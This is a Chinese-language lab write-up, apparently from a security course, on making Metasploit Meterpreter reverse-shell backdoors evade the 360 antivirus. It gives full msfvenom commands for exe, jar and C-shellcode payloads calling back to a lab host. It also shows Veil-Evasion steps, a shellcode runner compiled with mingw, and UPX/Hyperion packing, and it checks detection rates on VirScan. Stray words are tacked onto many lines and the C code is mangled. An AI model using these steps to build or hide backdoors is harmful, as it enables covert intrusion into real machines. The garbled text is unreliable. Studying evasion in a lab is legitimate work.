使用msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.235.144 LPORT=5212 -f exe >fenix.exe指令进行屡次编码,生成.exe的后门程序 java
放到windows系统中,360确定是能够直接发现的,没有测试的必要python
使用virscan进行扫描,结果以下所示: shell
用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.235.144 lport=5212 x> 5212met.jar生成.jar的后门程序编程
使用msfconsole回连成功 (没启动杀软)windows
放到windows7系统中,杀软并发现它了,扫描没问题,可是运行会查杀安全
使用virscan进行扫描,结果以下所示: 网络
检测率下降了,但没有实现免杀并发
输入veil,启用veilapp
输入use evasion,进入veil-evasiontcp
输入list,查看可生成文件的格式
输入use 7,选择C语言格式
用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.144 LPORT=5212 -f c生成一段shellcode
利用shellcode编写一个C语言程序后门,再用i686-w64-mingw32-g++ feniexp3.c -o fenixexp3.exe编译运行后,测试其可用性
int main() { int (func)() = (int()())buf; func(); } - 生成文件如图
直接用.C交叉编译生成的exe文件复制到Windows中是没法运行的,错误提示BEX,是win下面相似堆栈保护的机制(可是UPX压索壳加密后能够运行可用回连;upx加壳后的exe再用hyperion加密壳加密后不可再win下面不能够运行,错误提示appcrash,此次缘由再也不是堆栈保护机制,而是编译C生成的EXE文件这么一层一层弄下来文件自己坏了)
upx加密的EXE成功链接
对任务一中使用Veil,c/meterpreter/rev_tcp.py生成的fenixveil.exe可执行文件加UPX压缩壳尝试实现免杀 被控机是Win7虚拟机,电脑杀软为360(最新版就这周安装的)
在安装运行Veil-Evasion时,遇到不少错,很棘手
C交叉编译生成的exe文件、hyperion加密壳生成的exe文件在win7下没法执行。
(1)杀软是如何检测出恶意代码的?
(3)免杀的基本方法有哪些?